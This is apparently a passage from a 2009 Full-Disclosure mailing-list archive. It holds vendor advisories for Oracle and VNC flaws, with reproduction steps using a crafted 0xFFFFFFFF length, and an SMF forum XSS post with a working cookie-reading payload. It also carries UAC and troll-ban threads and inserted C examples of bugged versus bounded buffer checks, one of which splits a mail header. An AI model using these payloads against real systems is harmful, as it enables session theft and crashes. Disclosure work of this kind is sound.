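    return copy_rcpt_bounded("To:<user@example.net>", addr, sizeof addr);
}

int demo_largest_fit(void)     /* ADDR_MAX - 1 bytes: the longest that fits */
{
    char arg[ADDR_MAX + 16], addr[ADDR_MAX];
    make_arg(arg, sizeof arg, ADDR_MAX - 1);
    return copy_rcpt_bounded(arg, addr, sizeof addr);
}

int demo_one_too_long(void)    /* exactly ADDR_MAX bytes: refused */
{
    char arg[ADDR_MAX + 16], addr[ADDR_MAX];
    make_arg(arg, sizeof arg, ADDR_MAX);
    return copy_rcpt_bounded(arg, addr, sizeof addr);
}

int demo_buggy_check_accepts(void) /* 1: the '>' check would let it through */
{
    char arg[ADDR_MAX + 16];
    size_t alen;
    make_arg(arg, sizeof arg, ADDR_MAX);
    return rcpt_path(arg, &alen) != NULL && !(alen > ADDR_MAX);
}

int main(void)
{
    printf("normal: %d largest_fit: %d one_too_long: %d buggy_accepts: %d\n",
           demo_normal(), demo_largest_fit(), demo_one_too_long(),
           demo_buggy_check_accepts());
    return 0;
}
```

`copy_rcpt_off_by_one` is present only to show the shape of the bug and is never executed, because the one-byte write past the array is undefined behaviour; `demo_buggy_check_accepts` evaluates only the comparison that differs, which is enough to show that the exact-size input is the one the buggy check lets through.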
Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

From nytrokiss at gmail.com Mon Feb 2 18:47:41 2009
From: nytrokiss at gmail.com (James Matthews)
Date: Mon, 2 Feb 2009 20:47:41 +0200
Subject: [Full-disclosure] Windows 7 UAC compromised
Message-ID: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com>

http://www.istartedsomething.com/20090130/uac-security-flaw-windows-7-beta-proof/

Windows is like swiss cheese!

-- 
http://www.goldwatches.com/
http://www.jewelerslounge.com/

From Valdis.Kletnieks at vt.edu Mon Feb 2 19:07:02 2009
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Mon, 02 Feb 2009 14:07:02 -0500
Subject: [Full-disclosure] Windows 7 UAC compromised
In-Reply-To: Your message of "Mon, 02 Feb 2009 20:47:41 +0200." <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com>
References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com>
Message-ID: <28242.1233601622@turing-police.cc.vt.edu>

On Mon, 02 Feb 2009 20:47:41 +0200, James Matthews said:
> http://www.istartedsomething.com/20090130/uac-security-flaw-windows-7-beta-proof/
>
> Windows is like swiss cheese!

The biggest issue here is that although it's technically easy to fix this problem (just have UAC issue an alert when somebody's messing with the system settings), it involves doing more of what end users dislike most about UAC (it issuing alerts to Joe Sixpack all the time when he does something bone-headed security-wise).

Fixing this one in a way that users will put up with will be a bitch.

From tbiehn at gmail.com Mon Feb 2 19:46:40 2009
From: tbiehn at gmail.com (T Biehn)
Date: Mon, 2 Feb 2009 14:46:40 -0500
Subject: [Full-disclosure] Windows 7 UAC compromised
In-Reply-To: <28242.1233601622@turing-police.cc.vt.edu>
References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu>
Message-ID: <2d6724810902021146k43bf983bx380b5119be96809f@mail.gmail.com>

Not at all, Valdis.

Keep UAC exceptions for Desktop Settings, Keyboard Settings, mundane / trivial. Prompt from UAC on regedit32, reg, secedit, gpedit, the proggy that modifies UAC settings. Most "Joe Sixpacks" will never touch any of that, and power users that do will understand why they're being prompted.

Wow, that -was- a bitch.

This reminds me of when SP2 came out and you could just pop registry keys in allowing your naughty program to execute before it attempted to access the net.

On Mon, Feb 2, 2009 at 2:07 PM, wrote:
> On Mon, 02 Feb 2009 20:47:41 +0200, James Matthews said:
> > http://www.istartedsomething.com/20090130/uac-security-flaw-windows-7-beta-proof/
> >
> > Windows is like swiss cheese!
>
> The biggest issue here is that although it's technically easy to fix this
> problem (just have UAC issue an alert when somebody's messing with the
> system settings), it involves doing more of what end users dislike most
> about UAC (it issuing alerts to Joe Sixpack all the time when he does
> something bone-headed security-wise).
>
> Fixing this one in a way that users will put up with will be a bitch.
>

From mailinglist at brainiacghost.co.uk Mon Feb 2 19:14:36 2009
From: mailinglist at brainiacghost.co.uk (Christopher Pritchard)
Date: Mon, 2 Feb 2009 19:14:36 -0000
Subject: [Full-disclosure] Windows 7 UAC compromised
In-Reply-To: <28242.1233601622@turing-police.cc.vt.edu>
References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu>
Message-ID: <003d01c9856a$a3bd2780$eb377680$@co.uk>

> The biggest issue here is that although it's technically easy to fix
> this problem (just have UAC issue an alert when somebody's messing with
> the system settings), it involves doing more of what end users dislike
> most about UAC (it issuing alerts to Joe Sixpack all the time when he
> does something bone-headed security-wise).
>
> Fixing this one in a way that users will put up with will be a bitch.

Why not just have it not prompt if you are changing settings, except for UAC settings? That would be the simple way around it.

From filip.waeytens at gmail.com Mon Feb 2 18:57:59 2009
From: filip.waeytens at gmail.com (Filip Waeytens)
Date: Mon, 2 Feb 2009 19:57:59 +0100
Subject: [Full-disclosure] BruCON call for papers
Message-ID:

Hi,

BruCON aims to become the best and most fun hacking (*) and security event in Belgium and W. Europe, offering a high-quality line-up of speakers, opportunities for networking with peers, hacking challenges and workshops.

BruCON is an open-minded gathering of people discussing computer security, privacy, information technology and its cultural/technical implications on society. The conference creates bridges between the various actors active in the computer security world, including but not limited to hackers (*), security professionals, security communities, non-profit organizations, CERTs, students, law enforcement agencies, etc...

Call for Papers is officially open. Authors can now submit an abstract of their presentation at http://cfp.brucon.org .

Help us spread the word. The following resources are available to stay up to speed with the event.

- BruCON website : http://www.brucon.org/
- BruCON on Twitter : http://twitter.com/brucon
- BruCON on LinkedIN : http://www.linkedin.com/groups?gid=1777141
- BruCON Blog (RSS feed) : http://blog.brucon.org/ (http://feeds2.feedburner.com/Brucon )

cheers
Filip

From sirdarckcat at gmail.com Tue Feb 3 08:56:37 2009
From: sirdarckcat at gmail.com (Eduardo Vela)
Date: Tue, 3 Feb 2009 02:56:37 -0600
Subject: [Full-disclosure] SMF 1.1.7 Persistent XSS (requires permission to edit censor)
Message-ID: <8ba534860902030056n617c1d98w9edb4263c7f389d7@mail.gmail.com>

SMF 1.1.7 (simplemachines.org) XSS

Exploitation:

If you can modify the censor on an SMF forum, then you can make it execute arbitrary JS code.

http://SMF.Forum.com/index.php?action=postsettings;sa=censor

Just add the following entry:

http://www.test.xss/ => http://www.test-xss/" onerror="alert(document.cookie)

And then write a post, modify your signature, or send a PM with the code:

[img]http://www.test.xss/[/img]

And the HTML code generated will be..

Notes:
- SMF is not using httpOnly cookies.
- I'm going full disclosure with this because I've had bad experiences with the SMF team when reporting vulnerabilities..

Greetings!!

--
Eduardo
http://www.sirdarckcat.net/

From ureleet at gmail.com Tue Feb 3 14:47:19 2009
From: ureleet at gmail.com (Ureleet)
Date: Tue, 3 Feb 2009 09:47:19 -0500
Subject: [Full-disclosure] Administrivia: Spring Cleaning
In-Reply-To:
References:
Message-ID: <6158bb410902030647o33cff270k1d5967db1eaa98f2@mail.gmail.com>

i m willing to bet he is still on the list tho. who knows how many aliases he has. no--i m not 1, even tho he accuses me of being 1.

i guarantee hes watching right now.

On Mon, Feb 2, 2009 at 12:32 AM, Biz Marqee wrote:
> n3td3v being moderated is fantastic.
>
> his banning is not a strike against the "spirit" of fd, its someone standing up and saying "I have had enough of this fruitcake".
>
> full disclosure is great when its dropping 0day, discussing security in general, coming off as a righteous plan9 ninja, insulting people who disagree with your opinion and all the rest that goes along with it. it isnt great when you have a serial pest constantly baiting people and flooding the list with junk... junk that has no technical or even comedic value. its just rambling. he isnt some passing troll.. 3 years this guy has been spouting his nonsense and i am sure this isnt a decision that John takes lightly but something needed to be done before everyone left.

From ureleet at gmail.com Tue Feb 3 14:48:48 2009
From: ureleet at gmail.com (Ureleet)
Date: Tue, 3 Feb 2009 09:48:48 -0500
Subject: [Full-disclosure] Windows 7 UAC compromised
In-Reply-To: <003d01c9856a$a3bd2780$eb377680$@co.uk>
References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk>
Message-ID: <6158bb410902030648t173c6ad2ufa40a952cb491a6f@mail.gmail.com>

y not have ur os secure in the first place and designed with full permissions instead of bothering the user. look at linux, look at unix. theyve been doing it 4 years.

On Mon, Feb 2, 2009 at 2:14 PM, Christopher Pritchard wrote:
>> The biggest issue here is that although it's technically easy to fix
>> this problem (just have UAC issue an alert when somebody's messing with
>> the system settings), it involves doing more of what end users dislike
>> most about UAC (it issuing alerts to Joe Sixpack all the time when he
>> does something bone-headed security-wise).
>>
>> Fixing this one in a way that users will put up with will be a bitch.
>
> Why not just have it not prompt if you are changing settings, except for UAC settings? that would be the simple way around it

From Valdis.Kletnieks at vt.edu Tue Feb 3 15:09:45 2009
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Tue, 03 Feb 2009 10:09:45 -0500
Subject: [Full-disclosure] Windows 7 UAC compromised
In-Reply-To: Your message of "Tue, 03 Feb 2009 09:48:48 EST." <6158bb410902030648t173c6ad2ufa40a952cb491a6f@mail.gmail.com>
References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk> <6158bb410902030648t173c6ad2ufa40a952cb491a6f@mail.gmail.com>
Message-ID: <99936.1233673785@turing-police.cc.vt.edu>

On Tue, 03 Feb 2009 09:48:48 EST, Ureleet said:
> y not have ur os secure in the first place and designed with full
> permissions instead of bothering the user. look at linux, look at
> unix. theyve been doing it 4 years.

Well, that *would* be an alternate way to design a system - but how would you migrate an existing Windows box to a Windows 8 that did that? There is *such* a mass of software written specifically around all the cruft in the Windows APIs that the inertia is the single biggest reason people keep running Windows boxes.

From imipak at gmail.com Tue Feb 3 15:37:43 2009
From: imipak at gmail.com (imipak)
Date: Tue, 3 Feb 2009 15:37:43 +0000
Subject: [Full-disclosure] BBC "cyber war" piece
Message-ID:

"Nato officials have told the BBC their computers are under constant attack from organisations and individuals bent on trying to hack into their secrets."

http://news.bbc.co.uk/go/rss/-/1/hi/world/europe/7851292.stm

(NB - the author of that piece, IMNSHO, has a tendency to sound like an uncritical mouthpiece for the military-spooky complex.)

=i
--
make way for history
flickering like a long-lost memory

From pete.licoln at gmail.com Tue Feb 3 16:21:19 2009
From: pete.licoln at gmail.com (Pete Licoln)
Date: Tue, 3 Feb 2009 11:21:19 -0500
Subject: [Full-disclosure] Administrivia: Spring Cleaning
In-Reply-To: <6158bb410902030647o33cff270k1d5967db1eaa98f2@mail.gmail.com>
References: <6158bb410902030647o33cff270k1d5967db1eaa98f2@mail.gmail.com>
Message-ID:

Who cares anyway?

2009/2/3 Ureleet
> i guarantee hes watching right now.
>
> On Mon, Feb 2, 2009 at 12:32 AM, Biz Marqee wrote:
> > n3td3v being moderated is fantastic.
> >
> > his banning is not a strike against the "spirit" of fd, its someone standing up and saying "I have had enough of this fruitcake".
> >
> > full disclosure is great when its dropping 0day, discussing security in general, coming off as a righteous plan9 ninja, insulting people who disagree with your opinion and all the rest that goes along with it. it isnt great when you have a serial pest constantly baiting people and flooding the list with junk... junk that has no technical or even comedic value. its just rambling. he isnt some passing troll.. 3 years this guy has been spouting his nonsense and i am sure this isnt a decision that John takes lightly but something needed to be done before everyone left.

From shatter at appsecinc.com Tue Feb 3 17:55:11 2009
From: shatter at appsecinc.com (Shatter)
Date: Tue, 3 Feb 2009 12:55:11 -0500
Subject: [Full-disclosure] Team SHATTER Security Advisory: SQL Injection in Oracle Enterprise Manager (TARGET Parameter)
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Team SHATTER Security Advisory

SQL Injection in Oracle Enterprise Manager (TARGET Parameter)

January 29, 2009

Risk Level: Medium

Affected versions: Oracle Enterprise Manager 10g Grid Control 10.2.0.4 and previous patchsets

Remote exploitable: Yes (Authentication is needed)

Credits: This vulnerability was discovered and researched by Esteban Martínez Fayó of Application Security Inc.

Details:
SQL Injection works by attempting to modify the parameters passed to an application to change the SQL statements that are passed to a database. SQL injection can be used to insert additional SQL statements to be executed.

The "TARGET" parameter used in web page /em/console/reports/admin of the Oracle Enterprise Manager web application is vulnerable to SQL Injection attacks. It may be possible for a malicious user to execute a function with the elevated privileges of the SYSMAN database user in the repository database. This user has the DBA role granted.

Impact:
This vulnerability allows an Oracle Enterprise Manager user with VIEW (or more) privileges to execute a function call with the elevated privileges of the SYSMAN database user.

Vendor Status: Vendor was contacted and a patch was released.

Workaround: There is no workaround for this issue.

Fix: Apply Oracle Critical Patch Update January 2009 available at Oracle Metalink.

CVE: CVE-2008-5447

Links:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

Timeline:
Vendor Notification - 7/11/2008
Vendor Response - 7/14/2008
Fix - 1/13/2009
Public Disclosure - 1/29/2009

Application Security, Inc's database security solutions have helped over 1000 organizations secure their databases from all internal and external threats while also ensuring that those organizations meet or exceed regulatory compliance and audit requirements.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

From shatter at appsecinc.com Tue Feb 3 17:57:56 2009
From: shatter at appsecinc.com (Shatter)
Date: Tue, 3 Feb 2009 12:57:56 -0500
Subject: [Full-disclosure] Team SHATTER Security Advisory: Oracle Database Buffer Overflow in SYS.OLAPIMPL_T.ODCITABLESTART
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Team SHATTER Security Advisory

Oracle Database Buffer Overflow in SYS.OLAPIMPL_T.ODCITABLESTART

January 29, 2009

Risk Level: High

Affected versions: Oracle Database Server version 9iR2

Remote exploitable: Yes (Authentication to Database Server is needed)

Credits: This vulnerability was discovered and researched by Esteban Martínez Fayó of Application Security Inc.

Details:
Oracle Database Server provides the SYS.OLAPIMPL_T package. This package contains the procedure ODCITABLESTART, which is vulnerable to buffer overflow attacks.

Impact:
By default SYS.OLAPIMPL_T has EXECUTE permission granted to PUBLIC, so any Oracle database user can exploit this vulnerability. Exploitation of this vulnerability allows an attacker to execute arbitrary code. It can also be exploited to cause DoS (Denial of Service) by killing the Oracle server process.

Vendor Status: Vendor was contacted and a patch was released.

Workaround: Restrict access to the SYS.OLAPIMPL_T package.

Fix: Apply Oracle Critical Patch Update January 2009 available at Oracle Metalink.

CVE: CVE-2008-3974

Links:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html
http://www.appsecinc.com/resources/alerts/oracle/2009-02.shtml

Timeline:
Vendor Notification - 2/22/2005
Fix - 1/13/2009
Public Disclosure - 1/29/2009

Application Security, Inc's database security solutions have helped over 1000 organizations secure their databases from all internal and external threats while also ensuring that those organizations meet or exceed regulatory compliance and audit requirements.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

From advisories at coresecurity.com Tue Feb 3 20:11:46 2009
From: advisories at coresecurity.com (CORE Security Technologies Advisories)
Date: Tue, 03 Feb 2009 18:11:46 -0200
Subject: [Full-disclosure] CORE-2008-1009 - VNC Multiple Integer Overflows
Message-ID: <4988A502.3090904@coresecurity.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/

VNC Multiple Integer Overflows

1. *Advisory Information*

Title: VNC Multiple Integer Overflows
Advisory ID: CORE-2008-1009
Advisory URL: http://www.coresecurity.com/content/vnc-integer-overflows
Date published: 2009-02-03
Date of last update: 2009-02-03
Vendors contacted: UltraVNC, TightVNC
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Integer overflow
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 33568
CVE Name: CVE-2009-0388

3. *Vulnerability Description*

Multiple integer overflow vulnerabilities have been discovered in UltraVNC [1] and TightVNC [2], two (open source) remote control applications derived from the popular VNC [3] software. The vulnerabilities cause a miscalculation of a buffer size on the heap, allowing an attacker to corrupt a VNC client's heap and probably allowing code execution (exploitation is very likely).

4. *Vulnerable packages*

. UltraVNC - 1.0.2
. UltraVNC - 1.0.5
. TightVNC - 1.3.9
. Older versions are probably affected too, but they were not tested

5. *Non-vulnerable packages*

. UltraVNC - 1.0.5.4
. TightVNC - 1.3.10

6. *Vendor Information, Solutions and Workarounds*

VNC users connecting to untrusted servers should update their VNC viewers/clients.

The UltraVNC team has released patched binaries [4] for its viewer. Additional information can be found in the UltraVNC Forum (http://forum.ultravnc.info/).

The TightVNC team has released patched source code in [5]. TightVNC 1.3.10 will be released by Feb 10th 2009.

7. *Credits*

These vulnerabilities were discovered and researched by Ariel Futoransky, Fernando Russ and Alfredo Ortega from Core Security Technologies.

8. *Technical Description / Proof of Concept Code*

Multiple integer overflow vulnerabilities have been discovered in UltraVNC and TightVNC. The vulnerable functions are located in 'ClientConnection.cpp', and they are:

. 'ClientConnection::CheckBufferSize'
. 'ClientConnection::CheckFileZipBufferSize'

These functions are used in UltraVNC - 1.0.2 (and previous versions):

. 'ClientConnection::ReadServerCutText() : 3859'
. 'ClientConnection::Authenticate() : 1701'

And in TightVNC - 1.3.9 (and previous versions):

. 'ClientConnection::ReadServerCutText() : 2951'
. 'ClientConnection::ReadFailureReason() : 3066'

Other versions may be vulnerable too. Multiple VNC clients are affected, as they share the vulnerable code.

The integer overflow follows this pattern:

/-----------
unsigned int len; /* note the *unsigned int* */

// read len from the net
len = network.read_placeholder();

// check the size to ensure the network-related read buffer is as big as needed
CheckBufferSize( len ); // or CheckZipBufferSize(len);

// use the network-related read buffer
// ...
-----------/

where 'CheckBufferSize' looks like:

/-----------
(ClientConnection.cpp)
4185: // Makes sure netbuf is at least as big as the specified size.
4186: // Note that netbuf itself may change as a result of this call.
4187: // Throws an exception on failure.
4188: void ClientConnection::CheckBufferSize(int bufsize)
4189: {
4190:     if (m_netbufsize > bufsize) return;
...
...
-----------/

and 'CheckZipBufferSize' looks like:

/-----------
(ClientConnection.cpp)
4238: void ClientConnection::CheckFileZipBufferSize(int bufsize)
4239: {
4240:     unsigned char *newbuf;
4241:
4242:     if (m_filezipbufsize > bufsize) return;
...
...
-----------/

Also, other functions like 'CheckFileZipBufferSize()' and 'CheckFileChunkBufferSize()' follow the same vulnerable pattern.

The integer overflow will result in a heap corruption in the function 'ReadString()', which is often called after the bug in 'CheckBufferSize()'. This is not a comprehensive list of possible memory corruptions caused by this bug, as the vulnerable function is used in many places.

The integer overflow is caused by the mismatch between the data types of the argument 'bufsize' (signed int) and the buffer size members 'm_netbufsize' and 'm_filezipbufsize'. Both members are 'unsigned long', so '(unsigned long)-1 > (int)42 == TRUE', because the whole comparison is cast to unsigned long (0xFFFFFFFF > 0x2a).

Steps to reproduce:

The quickest way to reproduce this bug is by modifying the VNC server to send crafted evil packets as:

/-----------
(from the TightVNC vncClient.cpp sourcecode...)
358: BOOL vncClientThread::SendTextStringMessage(const char *str)
359: {
360:     CARD32 len = Swap32IfLE(strlen(str));
361:     if (!m_socket->SendExact((char *)&len, sizeof(len)))
362:         return FALSE;
363:     if (!m_socket->SendExact(str, strlen(str)))
364:         return FALSE;
365:
366:     return TRUE;
367: }
...
-----------/

Modifying line 360 so that a crafted length like 0xFFFFFFFF is sent triggers an exception in the following functions:

. In the case of UltraVNC, in 'ClientConnection::Authenticate()'
. In the case of TightVNC, in 'ClientConnection::ReadFailureReason()'

To trigger the bug in the function 'ClientConnection::CheckBufferSize' located in the file 'ClientConnection.cpp' (both vendors):

/-----------
(vncClient.cpp)
1848: void vncClient::UpdateClipText(LPSTR text)
1849: {
..
..
1858:     rfbServerCutTextMsg message;
1860:     message.length = Swap32IfLE(strlen(text));
1861:     if (!SendRFBMsg(rfbServerCutText, (BYTE *) &message, sizeof(message)))
1862:     {
1863:         Kill();
1864:         return;
1865:     }
1866:     if (!m_socket->SendQueued(text, strlen(text)))
1867:     {
1868:         Kill();
1869:         return;
1870:     }
1871: }
..
-----------/

In line 1860 the 'message.length' structure must be modified to some evil value like 0xFFFFFFFF.

9. *Report Timeline*

. 2009-01-09: Core notifies the TightVNC team of the vulnerability.
. 2009-01-09: Core notifies the UltraVNC team of the vulnerability.
. 2009-01-10: The UltraVNC team asks Core for a technical description of the vulnerability.
. 2009-01-12: Core notifies the TightVNC team of the vulnerability. The previous email sent by Core was rejected by the vendor email service.
. 2009-01-12: Technical details sent to UltraVNC team by Core.
. 2009-01-14: The TightVNC team asks Core for a technical description of the vulnerability.
. 2009-01-14: Technical details sent to TightVNC team by Core.
. 2009-01-21: TightVNC team notifies Core that a fix has been produced, but the release of the fixed version (TightVNC 1.3.10) will be available early February. TightVNC team releases the fix for its SVN users [5].
. 2009-01-26: Core asks TightVNC if the fixed version will be available on 02-Feb-2009. No reply received.
. 2009-01-26: Core asks UltraVNC team if a fixed version is available.
. 2009-01-26: UltraVNC team notifies Core that a fixed version will probably be available on Feb 1st 2009.
. 2009-01-30: Core notifies TightVNC and UltraVNC teams the advisory will be released on Feb 3rd 2009, given that the vulnerability was already made public [5].
. 2009-02-02: UltraVNC team notifies Core that a fix has been produced and will be available to the users on Tuesday, Feb 3rd.
. 2009-02-02: TightVNC team notifies Core that a patched version will be available to the users on Tuesday, Feb 10th.
. 2009-02-03: CORE-2008-1009 advisory is published.

10. *References*

[1] http://www.uvnc.com.
[2] http://www.tightvnc.com.
[3] http://www.realvnc.com.
[4] UltraVNC binary patches: http://support1.uvnc.com/download/vncviewer_1054_w32.zip and http://support1.uvnc.com/download/vncviewer_1054_X64.zip.
[5] http://vnc-tight.svn.sourceforge.net/viewvc/vnc-tight?view=rev&revision=3564.

11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://www.coresecurity.com/corelabs.

12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com.

13. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security Technologies and (c) 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.

14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

From marcio.barbado at gmail.com Tue Feb 3 21:40:56 2009
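The signed/unsigned mismatch that CORE-2008-1009 describes in section 8, shown beside a bounded variant, as an added example that is not UltraVNC or TightVNC code: the struct, function names and the MAX_MESSAGE_LEN ceiling are this example's own assumptions, and the size member is a 32-bit unsigned so the behaviour matches the 32-bit 'unsigned long' the advisory discusses on any host.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Added example modelled on the CheckBufferSize() pattern quoted in the
 * CORE-2008-1009 advisory above; not UltraVNC or TightVNC code. The struct,
 * function names and MAX_MESSAGE_LEN ceiling are assumptions. The size member
 * is uint32_t so the 32-bit 'unsigned long' behaviour the advisory describes
 * is reproduced regardless of the host's 'long' width. */

typedef struct {
    char    *netbuf;
    uint32_t netbufsize;   /* stands in for the 'unsigned long' m_netbufsize */
} client_t;

static void client_init(client_t *c) { c->netbufsize = 4096; c->netbuf = calloc(4096, 1); }
static void client_free(client_t *c) { free(c->netbuf); c->netbuf = NULL; c->netbufsize = 0; }

/* Vulnerable shape: an unsigned 32-bit wire length is passed to a signed 'int'
 * parameter. In the comparison it is promoted to the unsigned type of
 * netbufsize, so -1 becomes 0xFFFFFFFF and the early return is skipped; the
 * grow path then computes bufsize + 256, which for -1 is only 255. The buffer
 * ends up 255 bytes long while the caller still means to read 0xFFFFFFFF bytes.
 * Returns the buffer size after the call so the mismatch can be observed. */
static uint32_t check_buffer_size_vulnerable(client_t *c, int bufsize)
{
    if (c->netbufsize > (uint32_t)bufsize)   /* the implicit promotion, written out */
        return c->netbufsize;

    uint32_t newsize = (uint32_t)bufsize + 256u;   /* 32-bit wraparound, without signed UB */
    char *nb = realloc(c->netbuf, newsize ? newsize : 1);
    if (nb == NULL)
        return c->netbufsize;   /* the original throws here; size unchanged either way */
    c->netbuf = nb;
    c->netbufsize = newsize;
    return c->netbufsize;
}

/* Assumed per-message ceiling for this example (not a VNC protocol constant). */
#define MAX_MESSAGE_LEN (16u * 1024u * 1024u)

/* Hardened shape: keep the length unsigned as it is on the wire, bound it before
 * any arithmetic or allocation, then grow. needed + 256 cannot wrap. */
static bool check_buffer_size_hardened(client_t *c, uint32_t needed)
{
    if (needed > MAX_MESSAGE_LEN)
        return false;                  /* reject the untrusted length outright */
    if (c->netbufsize > needed)
        return true;                   /* already large enough */
    uint32_t newsize = needed + 256u;
    char *nb = realloc(c->netbuf, newsize);
    if (nb == NULL)
        return false;
    c->netbuf = nb;
    c->netbufsize = newsize;
    return true;
}

/* Constructed wire lengths: a normal clipboard message and the crafted value
 * discussed under "Steps to reproduce" in the advisory. */
#define WIRE_LEN_BENIGN  42u
#define WIRE_LEN_CRAFTED 0xFFFFFFFFu

/* Would the vulnerable check leave the buffer smaller than the length the
 * caller goes on to read? true means the following read overruns the heap. */
static bool vulnerable_path_overruns(uint32_t wire_len)
{
    client_t c;
    client_init(&c);
    uint32_t have = check_buffer_size_vulnerable(&c, (int)wire_len);  /* 0xFFFFFFFF -> -1 */
    client_free(&c);
    return have < wire_len;
}

/* Does the hardened check let this length reach the read at all? */
static bool hardened_path_accepts(uint32_t wire_len)
{
    client_t c;
    client_init(&c);
    bool ok = check_buffer_size_hardened(&c, wire_len);
    client_free(&c);
    return ok;
}

int main(void)
{
    uint32_t lens[] = { WIRE_LEN_BENIGN, WIRE_LEN_CRAFTED };
    for (size_t i = 0; i < 2; i++)
        printf("len 0x%08x: vulnerable overruns=%d, hardened accepts=%d\n", (unsigned)lens[i],
               vulnerable_path_overruns(lens[i]), hardened_path_accepts(lens[i]));
    return 0;
}
```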
From: marcio.barbado at gmail.com (M.B.Jr.)
Date: Tue, 3 Feb 2009 19:40:56 -0200
Subject: [Full-disclosure] Windows 7 UAC compromised
In-Reply-To: <003d01c9856a$a3bd2780$eb377680$@co.uk>
References: <8a6b8e350902021047v1028a346iaa60dcbe4c50eb95@mail.gmail.com> <28242.1233601622@turing-police.cc.vt.edu> <003d01c9856a$a3bd2780$eb377680$@co.uk>
Message-ID: <2df3b0cb0902031340k70ffc9d9l73c095672773228b@mail.gmail.com>

Windows says: Hello world! Check this out, world, this is really cool. Now I have, uh, something like, uh, "privileges management"!

"UAC" is no more than a new commercial designation for something about 40 years old. And they (Redmond) are still missing the concept's point.

On Mon, Feb 2, 2009 at 5:14 PM, Christopher Pritchard wrote:
>> The biggest issue here is that although it's technically easy to fix
>> this problem (just have UAC issue an alert when somebody's messing with
>> the system settings), it involves doing more of what end users dislike
>> most about UAC (it issuing alerts to Joe Sixpack all the time when he
>> does something bone-headed security-wise).
>>
>> Fixing this one in a way that users will put up with will be a bitch.
>
> Why not just have it not prompt if you are changing settings, except for UAC settings? that would be the simple way around it

--
Marcio Barbado, Jr.

From biz.marqee at gmail.com Wed Feb 4 00:21:56 2009
From: biz.marqee at gmail.com (Biz Marqee)
Date: Wed, 4 Feb 2009 11:21:56 +1100
Subject: [Full-disclosure] Administrivia: Spring Cleaning
In-Reply-To: <6158bb410902030647o33cff270k1d5967db1eaa98f2@mail.gmail.com>
References: <6158bb410902030647o33cff270k1d5967db1eaa98f2@mail.gmail.com>
Message-ID:

yea he is watching - hes been emailing me direct to respond to my criticism. welcome to my trash folder.

if nothing else this will make his pathetic existence on this list more difficult. you never know he might actually get the point and fuck off for good... but im not holding my breath on that one

On Wed, Feb 4, 2009 at :47 AM, Ureleet wrote:
> i m willing to bet he is still on the list tho. who knows how many
> aliases he has. no--i m not 1, even tho he accuses me of being 1.
>
> i guarantee hes watching right now.

From security at mandriva.com Wed Feb 4 14:47:00 2009
From: security at mandriva.com (security at mandriva.com)
Date: Wed, 04 Feb 2009 15:47:00 +0100
Subject: [Full-disclosure] [ MDVSA-2009:033 ] sudo
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

